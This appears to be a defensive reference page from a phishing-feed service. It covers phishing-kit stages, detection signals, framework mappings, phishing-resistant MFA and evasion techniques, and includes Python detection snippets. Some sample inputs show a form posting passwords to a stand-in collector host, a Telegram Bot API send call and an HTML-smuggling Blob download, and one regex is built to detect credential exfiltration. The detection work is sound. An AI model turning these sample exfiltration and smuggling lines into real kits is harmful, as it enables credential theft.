Phishing detection guide
A neutral, open reference on how modern phishing kits work, which signals defenders track and which industry frameworks to map them to.
What phishing is
Definition
Phishing is a social-engineering attack in which the adversary impersonates a trusted brand, service or individual to deceive the target and obtain credentials, deploy malware or have funds transferred.
MITRE ATT&CK classifies it as technique T1566, with four sub-techniques.
Sub-techniques
- T1566.001 Spearphishing Attachment - weaponized file
- T1566.002 Spearphishing Link - URL to a fake login page
- T1566.003 Spearphishing via Service - direct message / SaaS platform
- T1566.004 Spearphishing Voice - vishing
What phishing is NOT
Phishing is distinct from malware delivery (the kit may stage malware, but the technique is identity-targeted), from generic spam (which has no identity-impersonation step), and from Business Email Compromise (BEC) - which manipulates a real person's mailbox without the spoofed-domain landing page that defines phishing.
How kits work
Modern kits chain four stages. Detection at each stage feeds different signals into the pipeline that maintains phishunt's active feed.
1. Lure
Email, SMS (smishing), instant message or QR code (quishing) carrying a contextual hook - shipping notice, payroll, MFA reset, fake invoice.
Defender signal: SPF / DKIM / DMARC alignment, sender reputation, typosquat domain in the link.
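The typosquat signal above can be approximated with edit distance between each hostname label in the link and a list of protected brand names. The following is a minimal sketch, not phishunt's actual method: the `BRANDS` list, the function names and the distance threshold are illustrative assumptions, and a production check would also need homoglyph handling and public-suffix parsing.

```python
from urllib.parse import urlsplit

# Hypothetical watch list; a real deployment would load its own brands.
BRANDS = ["paypal", "microsoft", "netflix"]

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a rolling dynamic-programming row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]

def typosquat_hits(url: str, max_distance: int = 1) -> list[str]:
    """Return brands that some hostname label nearly, but not exactly, matches."""
    host = (urlsplit(url).hostname or "").lower()
    hits = []
    for brand in BRANDS:
        for label in host.split("."):
            if 0 < edit_distance(label, brand) <= max_distance:
                hits.append(brand)
                break
    return hits

print(typosquat_hits("https://paypa1.com/login"))
print(typosquat_hits("https://www.paypal.com/"))
```

An exact brand label on an unrelated registrable domain (for example `paypal.evil.example`) is deliberately not flagged here; that case belongs to the brand-keyword signal rather than the typosquat one.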
2. Landing page
The hosted fake-login page. Today's kits are HTML / JS bundles deployed on cheap shared hosting, with Telegram-bot exfiltration included by default.
Defender signal: brand-keyword in domain, fresh TLS cert in CT logs, asset-hash collision with a known kit, JavaScript obfuscation patterns.
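The asset-hash collision signal can be sketched as an exact-match lookup of fetched asset hashes against a set of hashes taken from known kits. This is a simplified illustration: the function names and the sample bytes are made up, and SHA-256 only catches byte-identical assets (a perceptual hash would be needed for near-duplicates).

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an asset body (exact-match hashing, not perceptual)."""
    return hashlib.sha256(data).hexdigest()

def kit_asset_matches(assets: dict[str, bytes],
                      known_kit_hashes: set[str]) -> list[str]:
    """Return the paths of fetched assets whose hash is in the known-kit set."""
    return sorted(
        path for path, body in assets.items()
        if sha256_hex(body) in known_kit_hashes
    )

# Made-up bytes standing in for a kit's logo and a stylesheet.
known = {sha256_hex(b"fake-logo-bytes")}
page_assets = {"/img/logo.png": b"fake-logo-bytes", "/css/site.css": b"body{}"}
print(kit_asset_matches(page_assets, known))
```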
3. Credential capture
The form posts username + password (and any second-factor field) to an operator endpoint. Adversary-in-the-middle kits relay live to the real service to harvest the post-MFA session cookie.
Defender signal: action= attribute pointing off-domain, mismatched form-encryption, missing CSRF token.
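The off-domain `action=` check can be sketched with the standard-library HTML parser. This is an illustrative sketch under simple assumptions: the class and function names are hypothetical, and hosts are compared by exact hostname, so a form posting to a sibling subdomain is also reported.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormActionCollector(HTMLParser):
    """Collects the action attribute of every <form> tag in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.actions: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            # A missing or empty action means "post back to the page itself".
            self.actions.append(dict(attrs).get("action") or "")

def off_domain_form_actions(page_url: str, html: str) -> list[str]:
    """Return resolved form targets whose hostname differs from the page's."""
    collector = FormActionCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    flagged = []
    for action in collector.actions:
        target = urljoin(page_url, action)  # resolves relative actions
        if urlsplit(target).hostname != page_host:
            flagged.append(target)
    return flagged

html = """
<form action="/session"><input name="user"></form>
<form action="https://collector.example.net/p.php"><input name="pass"></form>
"""
print(off_domain_form_actions("https://login.example.com/signin", html))
```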
4. Exfiltration
Telegram bot, simple email to a Gmail dropbox, or HTTP POST to a staging server. The session cookie or credential pair is then sold or replayed against the victim's enterprise SSO.
Defender signal: outbound traffic from compromised endpoints to known operator staging hosts; phishunt blocklists the staging hosts when the operator pivots through CT-visible certs.
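For the Telegram-bot exfiltration path, one content-side check is to scan kit source for calls to the Telegram Bot API, whose method URLs have the form `https://api.telegram.org/bot<token>/<method>`. The sketch below is an assumption-laden illustration: the token pattern is intentionally loose, the function name is hypothetical, and only the numeric bot ID is returned so the secret part of the token is not echoed into logs.

```python
import re

# Loose pattern: numeric bot ID, a colon, then the secret part of the token.
TELEGRAM_BOT_URL = re.compile(
    r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+/(\w+)"
)

def find_telegram_exfil(source: str) -> list[tuple[str, str]]:
    """Return (bot_id, api_method) pairs for Bot API URLs found in source."""
    return [(m.group(1), m.group(2)) for m in TELEGRAM_BOT_URL.finditer(source)]

sample = 'fetch("https://api.telegram.org/bot123456:ABC-def_1/sendMessage?chat_id=1")'
print(find_telegram_exfil(sample))
```

Obfuscated kits often split or encode this URL, so an empty result does not show that Telegram exfiltration is absent.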
Detection signals
Defenders combine three layers of signals. None is sufficient on its own; current kits can usually bypass any one of them when it is used in isolation.
| Layer | What it observes | Typical signals |
|---|---|---|
| Network | Everything visible before the page renders. | Certificate Transparency log streams, DNS reputation, brand-keyword lexical scoring on newly registered domains, JA3 / JA4 TLS fingerprints, MX/SPF on the lure domain. |
| Content | The rendered page itself. | Brand-asset image-hash collision, form action= off-domain, missing BIMI on lure email sender, HTML smuggling patterns, page-DOM perceptual-hash match against a known kit. |
| Behavior | How the page reacts to visitors. | Geo / IP filtering (only victim country sees real page), CAPTCHA / Turnstile gate before kit reveals itself, OAST canary-callback evidence (e.g. interactsh) when probing for SSRF. |
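As an illustration of the network-layer "brand-keyword lexical scoring" signal, the sketch below scores a newly seen domain by weighted keyword hits plus hyphen count. The keyword weights, the allowlist and the function name are all hypothetical choices for this example, not phishunt's actual scoring.

```python
# Hypothetical weights: brand names count more than generic lure words.
KEYWORD_WEIGHTS = {"paypal": 3, "login": 1, "secure": 1, "verify": 1}

# Hypothetical allowlist of the brand's own registrable domains.
OFFICIAL_DOMAINS = {"paypal.com"}

def lexical_score(domain: str) -> int:
    """Score a domain name: higher means more lure-like. Official domains score 0."""
    name = domain.lower().rstrip(".")
    if name in OFFICIAL_DOMAINS or any(
        name.endswith("." + official) for official in OFFICIAL_DOMAINS
    ):
        return 0
    score = sum(weight for kw, weight in KEYWORD_WEIGHTS.items() if kw in name)
    score += name.count("-")  # hyphen-stuffed names are common in lure domains
    return score

for candidate in ("paypal-secure-login.example", "www.paypal.com", "example.org"):
    print(candidate, lexical_score(candidate))
```

A score like this is only a triage input; in keeping with the layered approach above, it would be combined with content and behavior signals before a domain is flagged.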
Industry frameworks
OWASP Top 10
Phishing maps primarily to A07:2021 Identification and Authentication Failures, since the kit's purpose is to defeat authentication. Anti-phishing controls also touch A05:2021 Security Misconfiguration when the impersonated site fails to enforce HSTS, secure cookies or strict CSP.
NIST SP 800-53 / 800-46
The relevant control families are AC-2 account management, IA-2 identification and authentication of organizational users, AT-2 security awareness training, and SI-3 malicious code protection. NIST SP 800-46 (Telework) calls out phishing-resistant MFA explicitly.
MITRE ATT&CK technique tree
T1566 (Phishing) sits inside the Initial Access (TA0001) tactic. Once the credential is stolen, follow-on TTPs typically chain through T1078 Valid Accounts (listed under the Initial Access, Persistence, Privilege Escalation and Defense Evasion tactics), then TA0006 Credential Access and TA0008 Lateral Movement. Defender mappings should include detective controls at each tactic transition, not just at T1566 itself.
Phishing-resistant MFA
Modern AitM kits relay credentials and MFA responses live to the real service and capture the resulting post-MFA session cookie. SMS OTP, time-based OTP and push notifications all fall to AitM. Only origin-bound MFA defeats it.
| Factor | Phishing-resistant? | Why / why not |
|---|---|---|
| SMS OTP | No | The code is transferable; an AitM kit relays it instantly. Also vulnerable to SIM swap. |
| TOTP (Google Authenticator, Authy) | No | The 30-second window is more than enough for an AitM kit to relay the code. |
| Push approval (Duo, Microsoft Authenticator) | Partial | Number matching helps; plain "approve / deny" prompts fall to fatigue and AitM. |
| FIDO2 / WebAuthn passkey | Yes | Cryptographic challenge bound to the origin (RP ID). The attacker's fake domain has a different RP ID, so the authenticator refuses to sign. |
| Smartcard / PIV | Yes | Same origin-binding property as WebAuthn. |
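The origin binding in the WebAuthn row can be modelled roughly as follows. This is a simplified sketch, not the full WebAuthn algorithm: the function names are hypothetical, and the real check additionally rejects RP IDs that are public suffixes. It shows why a look-alike host cannot claim the legitimate RP ID, and that the authenticator data carries a SHA-256 hash of the RP ID.

```python
import hashlib

def rp_id_allowed(origin_host: str, rp_id: str) -> bool:
    """Simplified rule: the RP ID must equal the host or be a parent domain of it."""
    host = origin_host.lower().rstrip(".")
    rp = rp_id.lower().rstrip(".")
    return host == rp or host.endswith("." + rp)

def rp_id_hash(rp_id: str) -> bytes:
    """SHA-256 of the RP ID, as included in WebAuthn authenticator data."""
    return hashlib.sha256(rp_id.encode("utf-8")).digest()

# The legitimate site may use its own domain as RP ID...
print(rp_id_allowed("accounts.example.com", "example.com"))
# ...but a phishing host that merely embeds the brand name may not.
print(rp_id_allowed("example.com.evil.test", "example.com"))
```

Because credentials are scoped to the RP ID, an assertion produced on the attacker's domain (if any) carries a different RP ID hash and fails verification at the real service.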
Common evasion techniques
Adversary-in-the-Middle (AitM)
Kits such as Evilginx, Tycoon-2FA and Modlishka reverse-proxy the real login site and capture the session cookie post-MFA. This defeats SMS, TOTP and push-approval factors.
CAPTCHA / Turnstile gates
Kits gate the malicious page behind a Cloudflare Turnstile or Google reCAPTCHA. Automated crawlers (and many sandboxes) fail the challenge and never see the kit; the victim does.
Geo / IP filtering
Server-side filters return a benign decoy page to any IP outside the victim country, ASN or specific subnet range. Detection requires fetching from the same egress as the target audience.
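Once the same URL has been fetched from several egress points, cloaking can be suspected when the responses fall into more than one content group. The sketch below assumes the bodies were already collected (the fetching itself is out of scope), and the egress labels and function names are illustrative. Exact hashing will also split pages that differ only by nonces or timestamps, so a real comparison would normalize or fuzzy-hash the content first.

```python
import hashlib
from collections import defaultdict

def group_by_content(responses: dict[str, bytes]) -> dict[str, list[str]]:
    """Group egress labels by the SHA-256 of the (whitespace-trimmed) body."""
    groups: dict[str, list[str]] = defaultdict(list)
    for egress, body in responses.items():
        digest = hashlib.sha256(body.strip()).hexdigest()
        groups[digest].append(egress)
    return dict(groups)

def cloaking_suspected(responses: dict[str, bytes]) -> bool:
    """True when different egress points received different page content."""
    return len(group_by_content(responses)) > 1

# Made-up bodies: two vantage points see a decoy, one sees the login form.
fetched = {
    "datacenter-us": b"<h1>Welcome to nginx</h1>",
    "datacenter-de": b"<h1>Welcome to nginx</h1>\n",
    "residential-es": b"<form action='https://collector.example.net/p.php'>",
}
print(cloaking_suspected(fetched))
```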
HTML smuggling
The lure email or page contains JavaScript that reassembles the malicious payload client-side (typically as a Blob), bypassing email-gateway content scanners that inspect attachments at rest.
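A static scan for HTML smuggling can look for the browser APIs typically involved: `Blob` construction, `atob` decoding, and a save trigger such as `URL.createObjectURL` or a `download` attribute. The indicator names, the regular expressions and the "builds a payload and triggers a save" rule below are illustrative assumptions; legitimate pages also use these APIs, so this is a triage heuristic rather than a verdict.

```python
import re

# Hypothetical indicator set built from standard browser APIs.
SMUGGLING_INDICATORS = {
    "blob_constructor": re.compile(r"new\s+Blob\s*\("),
    "base64_decode": re.compile(r"\batob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "legacy_save": re.compile(r"msSaveOrOpenBlob"),
    "download_attr": re.compile(r"\.download\s*=|<a[^>]+\bdownload\b",
                                re.IGNORECASE),
}

def smuggling_indicators(html: str) -> list[str]:
    """Return the names of all indicators present in the document."""
    return [name for name, pattern in SMUGGLING_INDICATORS.items()
            if pattern.search(html)]

def looks_like_smuggling(html: str) -> bool:
    """Flag pages that both build a Blob and trigger a client-side save."""
    found = set(smuggling_indicators(html))
    builds_payload = "blob_constructor" in found
    triggers_save = bool(found & {"object_url", "legacy_save", "download_attr"})
    return builds_payload and triggers_save

sample = ('<script>var b = new Blob([atob("AAAA")]);'
          'var a = document.createElement("a");'
          'a.href = URL.createObjectURL(b); a.download = "invoice.iso";'
          'a.click();</script>')
print(smuggling_indicators(sample))
print(looks_like_smuggling(sample))
```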
Glossary
- ACME: Automatic Certificate Management Environment - the protocol Let's Encrypt and Google Trust Services use for free / automated TLS issuance.
- AitM: Adversary-in-the-Middle - a kit pattern that reverse-proxies the real login site to harvest the post-MFA session cookie.
- BIMI: Brand Indicators for Message Identification - a verified-logo signal in email envelopes; an absent BIMI on a sender claiming to be a brand is a phishing tell.
- CT log: Certificate Transparency log - a public append-only log every public CA must submit certificates to. Defenders monitor CT logs for brand-keyword domains as an early-warning signal.
- DV / OV / EV: Certificate validation tiers: Domain Validated (proof of domain control), Organization Validated, Extended Validation. DV is the most common and the cheapest to abuse.
- HSTS: HTTP Strict Transport Security - forces browsers to use HTTPS only. HSTS preload (the browser-baked-in list) is near-irreversible and should not be set lightly.
- JA3 / JA4: TLS-handshake fingerprints. Phishing kits often reuse the same TLS stack across thousands of staged domains, producing recognizable fingerprints.
- MTA-STS: SMTP MTA Strict Transport Security - mail-server analogue of HSTS. Reduces ability of an attacker to downgrade SMTP to plaintext for MITM.
- OAST: Out-of-band Application Security Testing - canary URLs (e.g. interactsh, Burp Collaborator) that record DNS / HTTP / SMTP requests, used to confirm blind vulnerabilities.
- RP ID: Relying Party ID in WebAuthn - the origin the authenticator binds the credential to. Phishing-resistant MFA's core property.
FAQ
Is phishunt's data CC0?
Yes. The data published through TXT, JSON, CSV feeds and the public REST API is released under Creative Commons CC0 1.0. The website code, branding and trademarks are not covered by CC0.
How fresh is phishunt's data?
The detection pipeline runs hourly and active sites are rechecked every six hours. Domains stay in the active feed only while they keep returning a phishing page; sites that go down or get cleaned up leave the feed.
How does phishunt compare to PhishTank or OpenPhish?
All three publish phishing IOCs but they target different ingest modes: PhishTank is community-curated, OpenPhish is a commercial paid feed, phishunt is detection-driven from CT logs and newly registered domains. The three feeds complement each other rather than replace each other.
How do I report a phishing site (or a false positive)?
Email [email protected] with the URL and any context. False-positive reports go to the same address; they are reviewed and removed within 24 hours on weekdays.
Can I integrate phishunt into my SOC tooling?
Yes. The /api/ page documents the REST endpoints (free, no auth, CC0 data). For agentic / LLM-driven workflows the MCP server at mcp.phishunt.io exposes the same data as JSON-RPC tools (see /agents/ for setup snippets).
Why "suspicious" rather than "confirmed malicious"?
phishunt favors recall over precision. Sites that pass the brand-impersonation threshold ship to the active feed without third-party confirmation. Pair with Google Safe Browsing, urlscan or VirusTotal when you need confirmed verdicts.
Open educational reference. Last updated 2026-04-29. Suggestions and corrections to [email protected].